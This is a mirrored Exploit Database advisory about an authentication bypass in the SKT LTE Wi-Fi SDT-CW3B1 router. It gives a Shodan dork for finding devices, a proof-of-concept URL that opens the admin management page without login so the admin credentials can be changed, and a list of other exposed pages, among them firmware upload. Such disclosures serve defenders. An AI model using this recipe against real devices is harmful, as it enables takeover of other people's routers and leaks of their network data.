SKT LTE Wi-Fi SDT-CW3B1 – Unauthorized Admin Credential Change

• Exploit Database
• 37 阅读

• 作者： Safak Aslan
  日期： 2018-05-23
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44736/

• # Exploit Title: SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change
  # Shodan Dork: SDT-CW3B1
  # Date: 2018-05-23
  # Exploit Author: Safak Aslan
  # Vendor Homepage: http://telesquare.co.kr/
  # Version:SKT CW3B1 sw version 1.2.0
  # Tested on: Windows
  # CVE: -
   
  # Class: Unauthorized Admin Credential Change
  # Impact:The attacker can access, change and remove admin's credential and sensitive data of the device.
  # Remotely Exploitable: Yes
  # Authentication Required: No
   
  # Vulnerability Description
  
  /admin/management.shtml--> System Management access without authentication
  
  # Using the directory of /admin/management.shtml, it is possible to access directly System Management without authentication. 
  # The attacker has a right to change User ID, 
  # Password for General User, User ID, and Password for Admin.
  
  # Proof-of-Concept
  
  http://targetIP/admin/management.shtml 
  
  
  # Additional Info
  
  Additionally, the attacker can reach without authorization the below directories.
  /admin/upload_firmware.shtml (Router firmware and lte firmware upgrade)
  /internet/wan.shtml (WAN settings info leak)
  /index.html (Version and status info leak) 
  /nas/ftpsrv.shtml (The settings of FTP)
  /wifi2g/basic.shtml (The settings of Wireless)
  /admin/status.shtml (The leak information of access point status)
  /internet/lan.shtml(The leak information of LAN settings)
  /admin/statistic.shtml (System statistics info leak)
  /serial/serial_direct.shtml (The settings of direct serial)
  /admin/upload_firmware.shtml (Router Firmware and LTE Firmware upgrade)